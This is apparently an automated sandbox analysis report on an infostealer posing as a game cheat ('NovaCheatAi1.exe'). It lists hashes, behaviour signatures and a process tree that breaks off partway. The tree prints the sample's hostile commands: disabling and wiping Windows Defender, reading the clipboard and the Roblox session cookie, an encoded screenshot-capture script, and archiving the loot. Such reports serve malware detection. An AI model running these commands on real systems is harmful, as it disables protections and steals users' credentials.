Analysis

  • max time kernel
    92s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 17:08

General

  • Target

    NovaCheatAi1.exe

  • Size

    7.5MB

  • MD5

    146f40432003937e528c3125801bc54e

  • SHA1

    a0a4980b5828aa85267fb52c13d9226cb3121915

  • SHA256

    67c7772ab157f70d0af2ea190030f39bcac03ec0606faaf9b142c064497e804b

  • SHA512

    7c04dcbf1eb855a1105592ce8edfb840254ac3a2e4c07d2754999596d7cd5af4f94f7cdadf4658a2565bb78dcef291d04fd583a85ccce8c0cbe49781a68594b2

  • SSDEEP

    196608:CfgVVEg8wfI9jUC2gYBYv3vbW2+iITx1U6n/:7VVEgjIH2gYBgDWJTnz/

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe
    "C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4300
    • C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe
      "C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1360
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NovaCheatAi1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3812
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:744
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1004
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1960
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3224
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4944
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4652
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4676
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2684
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4620
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4360
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4368
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3572
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:892
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:1540
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              • Suspicious use of WriteProcessMemory
              PID:4292
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:956
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:1596
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:4556
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                3⤵
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:2456
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  4⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3560
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:3440
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:220
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:2036
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:3616
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:1880
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:2916
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:3648
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4664
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykgudnrt\ykgudnrt.cmdline"
                                5⤵
                                  PID:848
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98B6.tmp" "c:\Users\Admin\AppData\Local\Temp\ykgudnrt\CSC4E3C41FEE175468FAEB32037EEC785FC.TMP"
                                    6⤵
                                      PID:3912
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:3392
                                  • C:\Windows\system32\attrib.exe
                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Views/modifies file attributes
                                    PID:4108
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:3896
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3256
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3884
                                        • C:\Windows\system32\attrib.exe
                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:3412
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:2860
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4000
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            3⤵
                                              PID:424
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                4⤵
                                                • Enumerates processes with tasklist
                                                PID:4148
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:5092
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:2300
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:1612
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4336
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4572
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4568
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:3784
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3440
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:1784
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1652
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:744
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:3408
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Tmf8l.zip" *"
                                                                  3⤵
                                                                    PID:936
                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI43002\rar.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI43002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Tmf8l.zip" *
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:1832
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                    3⤵
                                                                      PID:764
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get Caption
                                                                        4⤵
                                                                          PID:3808
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                        3⤵
                                                                          PID:2584
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic computersystem get totalphysicalmemory
                                                                            4⤵
                                                                              PID:1948
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            3⤵
                                                                              PID:2924
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
